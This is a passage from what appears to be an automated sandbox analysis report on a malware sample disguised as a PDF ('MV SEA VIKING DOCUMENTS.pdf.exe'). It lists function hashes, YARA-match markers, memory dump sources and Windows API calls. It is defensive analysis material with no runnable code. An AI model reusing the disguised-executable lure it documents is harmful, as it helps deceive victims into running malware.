                                                                                                                                                                                                                                • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040755C Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                                                                                                                • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245754E Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 29bcea61125b738b659925dfbd1975e3495635b7c7c2aef650d61f2f49958db6
                                                                                                                                                                                                                                • Instruction ID: dc68f4de287e4e53b995d6e9a5862b33613317441966fb62707ea321391255f6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29bcea61125b738b659925dfbd1975e3495635b7c7c2aef650d61f2f49958db6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A28126B20883D66BC316CB78884AF96BFF4AF43648F1845DEDCC58B667C7265442CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 024506CE Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: edfd238c525bef052128511c211a5a8420e0620474e7ddcb9f061db702d3f82a
                                                                                                                                                                                                                                • Instruction ID: 1346c465df6afc7579f4fd0b41dab5e3cd6471b6eab99bb4a769ae2a52929577
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: edfd238c525bef052128511c211a5a8420e0620474e7ddcb9f061db702d3f82a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E01704D659B2A83EF50247147A67FA22924F29390ED4312B8CC3036D7E31A40DBCD83
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245787B Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: cf6c28c47260d234b716a2a2d826ec06b3c236289a1915aa7a286388441d29d4
                                                                                                                                                                                                                                • Instruction ID: c33191646e5563eea38229848bdc6e053dabd06a371ea8a83383eb6d446e3f47
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf6c28c47260d234b716a2a2d826ec06b3c236289a1915aa7a286388441d29d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48012232904646AFC358DF60C1809D2B7A0FF09350F158559E89A87B20CB39A867CBC0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245E40E Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7cb7c762796d2ba84e22db81c64a8ad3264fd8fb9da99824c9fbef748d28d9bb
                                                                                                                                                                                                                                • Instruction ID: cfb1436f574b4891c4665c7c289aca94b09730ae8767256e4a9e9bdefd9ff740
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cb7c762796d2ba84e22db81c64a8ad3264fd8fb9da99824c9fbef748d28d9bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F21109756052A8DFCB78CF24D984BDA77B1AF0A350F41855AEC898B366E330AA44CF11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245DB94 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bd7eb498b84ce8ebc00a7bbda838c728f72c9f57ae717e253e7b92be7a6a1186
                                                                                                                                                                                                                                • Instruction ID: d217caf909c7eafa2bb0a9615ff18b5476ac04ed15bd7aea8ed85999d019b0b0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd7eb498b84ce8ebc00a7bbda838c728f72c9f57ae717e253e7b92be7a6a1186
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00B09231E51A808FCA56DF09C290F4173B5FB54B80B4284E8E9259FB22C364EC00CA04
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                                                                                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                • String ID: $M$N
                                                                                                                                                                                                                                • API String ID: 2564846305-813528018
                                                                                                                                                                                                                                • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                                                                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404738
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040485A
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404876
                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                • String ID: Call$N
                                                                                                                                                                                                                                • API String ID: 3103080414-3438112850
                                                                                                                                                                                                                                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                                                                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                                                                                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                  • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406202
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                                                                                                                • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                                                                                • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
